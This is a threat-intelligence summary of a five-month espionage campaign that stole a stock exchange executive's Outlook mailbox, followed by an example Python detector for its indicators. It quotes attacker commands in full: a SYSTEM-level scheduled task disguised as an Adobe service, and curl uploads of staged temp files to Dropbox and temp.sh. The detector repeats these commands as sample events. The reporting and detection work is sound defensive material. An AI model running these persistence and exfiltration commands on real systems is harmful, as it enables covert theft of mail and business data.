Espionage Campaign Targeted Stock Exchange Executive for Five Months

A five-month espionage campaign targeted a senior executive’s Outlook mailbox at a major global stock exchange, using Dropbox, OneDrive Personal, and temporary hosting services to quietly exfiltrate mailbox data in small batches. The attackers relied on masquerading binaries, scheduled tasks, and an Aspose-based OST stealer to maintain persistence and avoid detection while stealing near-continuous email content. #Dropbox #OneDrive #Aspose #Outlook #MicrosoftOneDriveSyncServiceCore

Keypoints

  • The campaign focused on a single high-value target: the email account of a senior figure at a major global stock exchange.
  • The attackers maintained access for about five months, enabling long-term collection of emails, calendar data, contacts, and other sensitive business information.
  • Dropbox was used for exfiltration and command-and-control, with a persistent Dropbox application and reused OAuth credentials over the campaign.
  • OneDrive Personal was later added as a second exfiltration path, including connections to hard-coded Microsoft IP addresses to reduce DNS-based visibility.
  • An Aspose-based OST stealer was repeatedly used to convert and extract Outlook mailbox content in incremental date ranges.
  • The intruders relied on masquerading binaries, service-like scheduled tasks, and Windows temp directories to blend into normal system activity.
  • A brief use of temp.sh and several staged DLL/executable components suggested continued experimentation with stealth and persistence, though attribution to a known group was not possible.

MITRE Techniques

  • [T1053.005] Scheduled Task/Job: Scheduled Task – Used repeatedly to maintain persistence and run malicious components on a timer (‘schtasks /create /sc minute /mo 5 /rl highest /ru “system” /tn “MicrosoftWindowsAdobeARM Service” …’).
  • [T1036] Masquerading – Multiple binaries and task names were disguised as legitimate Adobe, OneDrive, Lenovo, and Microsoft components (‘mimic the legitimate Adobe Acrobat Reader Update service’, ‘masquerading as a Lenovo system-health check’).
  • [T1105] Ingress Tool Transfer – Tools and payloads were placed and reused on the host to support the intrusion (‘dropped into a series of Windows temp subfolders’, ‘reused across every Dropbox upload and download’).
  • [T1114.001] Email Collection: Local Email Collection – The attackers stole the contents of a local Outlook OST mailbox file for later exfiltration (‘Aspose-based OST stealer’, ‘target user’s Outlook OST as the input’).
  • [T1041] Exfiltration Over C2 Channel – Data was uploaded through Dropbox API traffic that doubled as command-and-control (‘used curl to upload data to the Dropbox content endpoint’).
  • [T1567.002] Exfiltration to Cloud Storage – Sensitive mailbox data was exfiltrated to Dropbox and OneDrive Personal (‘They used legitimate cloud services (Dropbox and OneDrive) for exfiltration’).
  • [T1021] Remote Services – Cloud Service – The attackers leveraged cloud services as interactive infrastructure for persistence and transfer (‘Dropbox API token’, ‘OneDrive Personal’).
  • [T1071.001] Application Layer Protocol: Web Protocols – HTTPS requests were used for upload and exfiltration activity (‘curl https://api.dropbox.com/oauth2/token’, ‘curl “https://onedrive.live.com/…’).
  • [T1090.002] Proxy: External Proxy – Cloud endpoints and public services were used to route activity through external infrastructure and obscure origin (‘use legitimate cloud services … for exfiltration and their command and control infrastructure’).

Indicators of Compromise

  • [SHA256 hashes] Malicious executables and DLLs used in the campaign – db59813e3f27fb8608a4876e758f60b69d9700dc22d15237ac095bb3166fb622, 6c700ca4e6d917c7aa9d964e98604a0349d9b8b4673df96a3f73a3d2d042635a, and 2 more hashes.
  • [File names] Masquerading binaries and staging files found on the victim host – ts_9ea0.tmp, onedrivesync.exe, and other named binaries such as armsvc.exe and oneservice.exe.
  • [File paths] Locations used for persistence and staging – CSIDL_COMMON_APPDATAadobearmarmsvc.exe, CSIDL_COMMON_APPDATAmicrosoft onedrivesetuponedrivesync.exe, and CSIDL_COMMON_APPDATAintel.
  • [Scheduled task names] Persistence artifacts created by the attackers – MicrosoftWindowsAdobeARM Service, MicrosoftWindowsLenovoCheckServerHealth, and MicrosoftWindowsMicrosoftOneDriveSyncServiceCore.
  • [IP addresses] Microsoft and temporary-hosting endpoints used for exfiltration – 13.107.137.11, 150.171.41.11, and 51.91.79.17.
  • [Domains / services] Cloud and file-transfer services used by the attackers – api.dropbox.com, content.dropboxapi.com, onedrive.live.com, and temp.sh.
  • [Command-line artifacts] Malicious execution patterns observed on the host – curl -X POST https://content.dropboxapi.com/2/files/upload and curl -F file=@c:windowstempTS_C7E3.tmp https://temp.sh/upload -k.
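As an added example (not code from the summary above or from the Symantec report it describes), the following Python script runs a small offline detection pass over constructed Windows process-creation events, flagging the behaviours and indicators listed here: SYSTEM-level, minute-interval scheduled tasks with vendor-styled names, curl uploads to the Dropbox, OneDrive and temp.sh endpoints, masquerading binaries launched from ProgramData or Windows temp, and the two SHA256 values printed above. The event layout, the expanded `C:\ProgramData\...` paths, the sample user names and the bearer-token placeholder are assumptions made for the demonstration.

```python
# Added example: offline detection over constructed process-creation events
# modelled on the command-line artifacts in the summary. Not from the report.
import ntpath
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Indicators copied from the summary (only the two SHA256 values it prints).
IOC_SHA256 = {
    "db59813e3f27fb8608a4876e758f60b69d9700dc22d15237ac095bb3166fb622",
    "6c700ca4e6d917c7aa9d964e98604a0349d9b8b4673df96a3f73a3d2d042635a",
}
IOC_HOSTS = {"api.dropbox.com", "content.dropboxapi.com", "onedrive.live.com",
             "temp.sh", "13.107.137.11", "150.171.41.11", "51.91.79.17"}
IOC_FILENAMES = {"armsvc.exe", "onedrivesync.exe", "oneservice.exe", "ts_9ea0.tmp"}

# Staging locations named in the summary: CSIDL_COMMON_APPDATA (ProgramData) and Windows temp.
STAGING_DIR_RE = re.compile(r"\\(programdata|windows\\temp)\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+")
TASK_NAME_RE = re.compile(r'/tn\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
RUN_AS_SYSTEM_RE = re.compile(r'/ru\s+"?(?:system|nt authority\\system)"?', re.IGNORECASE)


@dataclass
class Finding:
    event_index: int
    rule: str
    detail: str


def check_scheduled_task(cmd: str):
    """T1053.005: task created to run as SYSTEM at highest run level on a minute interval."""
    low = cmd.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    if not (RUN_AS_SYSTEM_RE.search(cmd) and "/sc minute" in low and "/rl highest" in low):
        return None
    m = TASK_NAME_RE.search(cmd)
    name = (m.group(1) or m.group(2)) if m else "<unknown>"
    return ("T1053.005", f"SYSTEM minute-interval task {name!r}")


def check_cloud_upload(image: str, cmd: str):
    """T1567.002 / T1041: curl talking to one of the listed cloud or temp-hosting endpoints."""
    if ntpath.basename(image).lower() != "curl.exe" and not cmd.lower().startswith("curl"):
        return None
    hosts = {urlparse(u).hostname for u in URL_RE.findall(cmd)}
    hit = sorted(h for h in hosts if h in IOC_HOSTS)
    return ("T1567.002", f"curl to listed endpoint(s) {hit}") if hit else None


def check_masquerade(image: str):
    """T1036: a binary with one of the masquerading names running from a staging directory."""
    if ntpath.basename(image).lower() in IOC_FILENAMES and STAGING_DIR_RE.search(image):
        return ("T1036", f"masquerading binary {image!r}")
    return None


def scan(events):
    """Run every rule over a list of process-creation events (dicts with image/cmd/sha256)."""
    findings = []
    for i, ev in enumerate(events):
        image, cmd, sha = ev.get("image", ""), ev.get("cmd", ""), ev.get("sha256", "").lower()
        hits = [check_scheduled_task(cmd), check_cloud_upload(image, cmd), check_masquerade(image),
                ("ioc-sha256", sha) if sha in IOC_SHA256 else None]
        findings.extend(Finding(i, *h) for h in hits if h)
    return findings


# Constructed sample events (paths expanded and users invented for the demonstration).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",  # persistence command quoted in the summary
     "cmd": r'schtasks /create /sc minute /mo 5 /rl highest /ru "system" '
            r'/tn "MicrosoftWindowsAdobeARM Service" /tr "C:\ProgramData\adobe\arm\armsvc.exe"'},
    {"image": r"C:\Windows\System32\schtasks.exe",  # benign daily task, not SYSTEM/highest
     "cmd": r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Tools\backup.exe"'},
    {"image": r"C:\Windows\System32\curl.exe",      # Dropbox upload of a staged temp file
     "cmd": r'curl -X POST https://content.dropboxapi.com/2/files/upload '
            r'-H "Authorization: Bearer <token-placeholder>" --data-binary @C:\Windows\Temp\ts_9ea0.tmp'},
    {"image": r"C:\Windows\System32\curl.exe",      # temp.sh upload quoted in the summary
     "cmd": r'curl -F file=@c:\windows\temp\TS_C7E3.tmp https://temp.sh/upload -k'},
    {"image": r"C:\ProgramData\adobe\arm\armsvc.exe",  # masquerading binary with a listed hash
     "cmd": "armsvc.exe",
     "sha256": "db59813e3f27fb8608a4876e758f60b69d9700dc22d15237ac095bb3166fb622"},
    {"image": r"C:\Windows\System32\curl.exe",      # benign curl to an internal service
     "cmd": "curl https://intranet.example.local/health"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_index}: [{f.rule}] {f.detail}")
```

The scheduled-task rule deliberately requires all three of `/ru system`, `/rl highest` and `/sc minute` together, which keeps ordinary daily maintenance tasks out of the results; in a real deployment the task-name check would be extended to compare vendor-styled names against the tasks a managed image actually ships with, and the host list fed from the full IoC set rather than the excerpt printed here.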

Read more: https://www.security.com/threat-intelligence/stock-exchange-espionage